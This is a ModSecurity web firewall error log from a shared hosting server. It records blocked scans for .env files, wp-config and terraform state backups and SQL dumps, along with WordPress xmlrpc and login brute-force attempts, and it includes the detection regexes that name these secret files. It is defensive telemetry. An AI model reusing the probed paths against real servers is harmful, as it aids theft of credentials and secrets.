[Tue May 26 14:30:12.301672 2026] [security2:error] [pid 606909:tid 607110] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stage/.env"] [unique_id "ahVhHF0yRtX9qA7aVUV1JwAAAMw"]
[Tue May 26 14:30:12.432466 2026] [security2:error] [pid 610693:tid 610890] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhGzvNO3hpmlY6M8RwIgAAAEM"]
[Tue May 26 14:30:12.542446 2026] [security2:error] [pid 610693:tid 610948] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/stripe/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwPwAAAH0"]
[Tue May 26 14:30:12.610700 2026] [security2:error] [pid 606909:tid 607152] [client 195.178.110.199:32936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVhHF0yRtX9qA7aVUV1LwAAAPY"]
[Tue May 26 14:30:12.635771 2026] [cgid:error] [pid 610693:tid 610926] [client 195.178.110.199:32968] AH01264: stderr from /home2/azurm42s/gestionbar.azurmediatec.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 14:30:12.655830 2026] [security2:error] [pid 610693:tid 610868] [client 195.178.110.199:32988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test.php"] [unique_id "ahVhHDvNO3hpmlY6M8RwRAAAAC0"]
[Tue May 26 14:30:12.685657 2026] [security2:error] [pid 610693:tid 610851] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/test/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwSQAAABw"]
[Tue May 26 14:30:12.834753 2026] [security2:error] [pid 610693:tid 610936] [client 195.178.110.199:33000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v2/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwTwAAAHE"]
[Tue May 26 14:30:12.886198 2026] [security2:error] [pid 610693:tid 610924] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/user/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwUAAAAGU"]
[Tue May 26 14:30:12.955531 2026] [security2:error] [pid 610693:tid 610870] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v1/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwUwAAAC8"]
[Tue May 26 14:30:12.968374 2026] [security2:error] [pid 610693:tid 610873] [client 195.178.110.199:32968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/v3/.env"] [unique_id "ahVhHDvNO3hpmlY6M8RwVQAAADI"]
[Tue May 26 14:30:13.184039 2026] [security2:error] [pid 606909:tid 607088] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/html/.env"] [unique_id "ahVhHV0yRtX9qA7aVUV1PwAAALY"]
[Tue May 26 14:30:13.232633 2026] [security2:error] [pid 610693:tid 610860] [client 195.178.110.199:32952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/web/.env"] [unique_id "ahVhHTvNO3hpmlY6M8RwZgAAACU"]
[Tue May 26 14:30:13.292326 2026] [security2:error] [pid 606909:tid 607087] [client 195.178.110.199:48006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/var/www/.env"] [unique_id "ahVhHV0yRtX9qA7aVUV1QQAAALU"]
[Tue May 26 14:30:13.459458 2026] [security2:error] [pid 606909:tid 607057] [client 195.178.110.199:32936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php"] [unique_id "ahVhHV0yRtX9qA7aVUV1RwAAAJc"]
[Tue May 26 14:30:13.481483 2026] [security2:error] [pid 610693:tid 610907] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.bak"] [unique_id "ahVhHTvNO3hpmlY6M8RwdgAAAFQ"]
[Tue May 26 14:30:13.500378 2026] [security2:error] [pid 610693:tid 610838] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/website/.env"] [unique_id "ahVhHTvNO3hpmlY6M8RwdwAAAA8"]
[Tue May 26 14:30:13.512295 2026] [security2:error] [pid 610693:tid 610904] [client 195.178.110.199:33000] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.old"] [unique_id "ahVhHTvNO3hpmlY6M8RwegAAAFE"]
[Tue May 26 14:30:13.628184 2026] [security2:error] [pid 606909:tid 607064] [client 195.178.110.199:48042] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-config.php.new"] [unique_id "ahVhHV0yRtX9qA7aVUV1TAAAAJ4"]
[Tue May 26 14:30:13.670395 2026] [security2:error] [pid 610693:tid 610853] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVhHTvNO3hpmlY6M8RwfgAAAB4"]
[Tue May 26 14:30:14.249802 2026] [security2:error] [pid 606909:tid 607153] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhHV0yRtX9qA7aVUV1UAAAAPc"]
[Tue May 26 14:30:15.502206 2026] [security2:error] [pid 610693:tid 610940] [client 114.119.150.168:63029] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVhHzvNO3hpmlY6M8RwpAAAAHU"], referer: https://glorodavionics.com?route=information/information&information_id=5
[Tue May 26 14:30:15.992768 2026] [security2:error] [pid 606909:tid 607065] [client 167.71.198.58:50549] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahVhH10yRtX9qA7aVUV1VwAAAJ8"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:30:16.192811 2026] [security2:error] [pid 610693:tid 610863] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhHzvNO3hpmlY6M8RwqAAAACg"]
[Tue May 26 14:30:16.615021 2026] [security2:error] [pid 606909:tid 607110] [client 167.71.198.58:50549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/blog//xmlrpc.php"] [unique_id "ahVhIF0yRtX9qA7aVUV1YQAAAMw"]
[Tue May 26 14:30:16.615176 2026] [security2:error] [pid 606909:tid 607110] [client 167.71.198.58:50549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shardagalaxy.com"] [uri "/blog//xmlrpc.php"] [unique_id "ahVhIF0yRtX9qA7aVUV1YQAAAMw"]
[Tue May 26 14:30:18.208188 2026] [security2:error] [pid 610693:tid 610902] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhITvNO3hpmlY6M8RwuwAAAE8"]
[Tue May 26 14:30:18.912206 2026] [security2:error] [pid 606909:tid 607138] [client 167.71.198.58:53509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.198.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/blog//wp-login.php"] [unique_id "ahVhIl0yRtX9qA7aVUV1hwAAAOg"], referer: https://shardagalaxy.com//blog//wp-login.php
[Tue May 26 14:30:19.080774 2026] [security2:error] [pid 606909:tid 607155] [client 202.141.83.254:5791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhI10yRtX9qA7aVUV1igAAAPk"]
[Tue May 26 14:30:19.081423 2026] [security2:error] [pid 606909:tid 607155] [client 202.141.83.254:5791] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhI10yRtX9qA7aVUV1igAAAPk"]
[Tue May 26 14:30:20.465252 2026] [security2:error] [pid 610693:tid 610949] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhJDvNO3hpmlY6M8Rw3AAAAH4"]
[Tue May 26 14:30:22.903344 2026] [security2:error] [pid 610693:tid 610732] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env"] [unique_id "ahVhJjvNO3hpmlY6M8Rw9QAADSY"]
[Tue May 26 14:30:22.942257 2026] [security2:error] [pid 610693:tid 610922] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhJjvNO3hpmlY6M8Rw7wAAAGM"]
[Tue May 26 14:30:23.919980 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhJzvNO3hpmlY6M8Rw-QAAABE"]
[Tue May 26 14:30:26.458268 2026] [security2:error] [pid 610693:tid 610824] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhKjvNO3hpmlY6M8RxIwAAAAE"]
[Tue May 26 14:30:26.978258 2026] [security2:error] [pid 610693:tid 610943] [client 113.164.94.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhKjvNO3hpmlY6M8RxLgAAAHg"]
[Tue May 26 14:30:27.988539 2026] [security2:error] [pid 610693:tid 610897] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhKzvNO3hpmlY6M8RxOgAAAEo"]
[Tue May 26 14:30:29.542988 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:5836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhLV0yRtX9qA7aVUV2WgAAALA"]
[Tue May 26 14:30:29.543124 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:5836] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhLV0yRtX9qA7aVUV2WgAAALA"]
[Tue May 26 14:30:29.950455 2026] [security2:error] [pid 610693:tid 610755] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env.backup"] [unique_id "ahVhLTvNO3hpmlY6M8RxWwAAID0"]
[Tue May 26 14:30:30.296407 2026] [security2:error] [pid 610693:tid 610748] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env.old"] [unique_id "ahVhLjvNO3hpmlY6M8RxXAAAIzY"]
[Tue May 26 14:30:30.593540 2026] [security2:error] [pid 606909:tid 607154] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhLl0yRtX9qA7aVUV2dQAAAPg"]
[Tue May 26 14:30:30.961507 2026] [security2:error] [pid 610693:tid 610756] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/.env.bak"] [unique_id "ahVhLjvNO3hpmlY6M8RxXgAAKD4"]
[Tue May 26 14:30:31.271604 2026] [security2:error] [pid 610693:tid 610761] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/config/.env"] [unique_id "ahVhLzvNO3hpmlY6M8RxXwAAH0M"]
[Tue May 26 14:30:31.536646 2026] [security2:error] [pid 610693:tid 610754] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/app/.env"] [unique_id "ahVhLzvNO3hpmlY6M8RxZAAADzw"]
[Tue May 26 14:30:31.846184 2026] [security2:error] [pid 610693:tid 610759] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/src/.env"] [unique_id "ahVhLzvNO3hpmlY6M8RxaAAAdkE"]
[Tue May 26 14:30:32.106126 2026] [security2:error] [pid 610693:tid 610753] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/backend/.env"] [unique_id "ahVhMDvNO3hpmlY6M8RxbAAAQjs"]
[Tue May 26 14:30:32.409906 2026] [security2:error] [pid 610693:tid 610760] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/api/.env"] [unique_id "ahVhMDvNO3hpmlY6M8RxcgAAT0I"]
[Tue May 26 14:30:32.838565 2026] [security2:error] [pid 610693:tid 610762] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/config.php"] [unique_id "ahVhMDvNO3hpmlY6M8RxdwAAUUQ"]
[Tue May 26 14:30:33.297298 2026] [security2:error] [pid 606909:tid 607147] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhMF0yRtX9qA7aVUV2oAAAAPE"]
[Tue May 26 14:30:33.451227 2026] [security2:error] [pid 610693:tid 610763] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/settings.php"] [unique_id "ahVhMTvNO3hpmlY6M8RxfgAACkU"]
